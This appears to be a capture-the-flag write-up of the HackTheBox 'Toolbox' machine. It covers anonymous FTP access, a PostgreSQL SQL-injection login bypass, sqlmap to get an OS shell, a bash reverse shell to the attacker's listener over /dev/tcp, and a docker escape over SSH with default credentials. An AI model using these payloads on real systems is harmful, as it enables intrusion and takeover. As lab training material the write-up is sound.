Hackthebox - Toolbox
Windows
Nmap
Let's add
admin.megalogistic.com
andmegalogistic.com
to our hosts file.
FTP
Anonymous FTP is allowed and we have on file on the target. Let's take it
curl --user anonymous:anonymous -o docker-toolbox.exe ftp://10.10.10.236/docker-toolbox.exe
Webserver
If we go to https://admin.megalogistic.com/ we have a login panel
If we put a quote in the user field we can generate a sql error
It is using
pg_query
so it is postgres sql.Let's try to do the most common bypass authentication payload except we translate it in postgresql this does the trick
username='+or+1=1--&password=aaa
In the browser it looks like this
If we google the "uplusion23" we find a github user https://github.com/uplusion23. if we have a look at his github page https://uplusion23.github.io/ we find his portfolio and then we can have a look at the admin panel on CodePen here
We have a todo list and a list of users
subdomain
Shell as postgresql
If we use sqlmap we can get a shell on the target sqlmap -r request -p username --os-shell
To get the request file we just need to right click in the burp request and select save item
We also find an .ssh folder with a known_hosts file
We can try to add our pu
Something weird is that if we cat /etc/passwd we do not find the user tony we found in /home. However the folder tony belongs to root so our root user might be named tony
Also this seems to be a docker instance.
Let's get a reverse shell we set a listener
rlwrap nc -nlvp 1234
this way we will get a more verbose shell in case of errorsthen we launch this from our previous prompt
bash -c 'bash -i >& /dev/tcp/10.10.14.5/1234 0>&1'
uname -a gives
command standard output: 'Linux bc56e3cc55e9 4.14.154-boot2docker #1 SMP Thu Nov 14 19:19:08 UTC 2019 x86_64 GNU/Linux'
so we loopback to this boot2dockerWe know it uses this docker: https://github.com/boot2docker/boot2docker
So If we want to escape docker we can ssh as docker to 172.17.0.1
ssh docker@172.17.0.1
(we can check ifconfig for this)We get a shell this way (the users and pass are in the git above)
The difficulty here is that we need to upgrade our shell and be quick because we loose the shell every few minutes.
Here is how to upgrade our shell (thanks to my friend Brianlane for the support on this part)
When we loose our shell and need to get it back we can repeat these steps just this way
And ssh again
ssh docker@172.17.0.1
If we
sudo -l
we can see that it allows tosudo su
without having to enter any password.The flag is not in the root folder
Last updated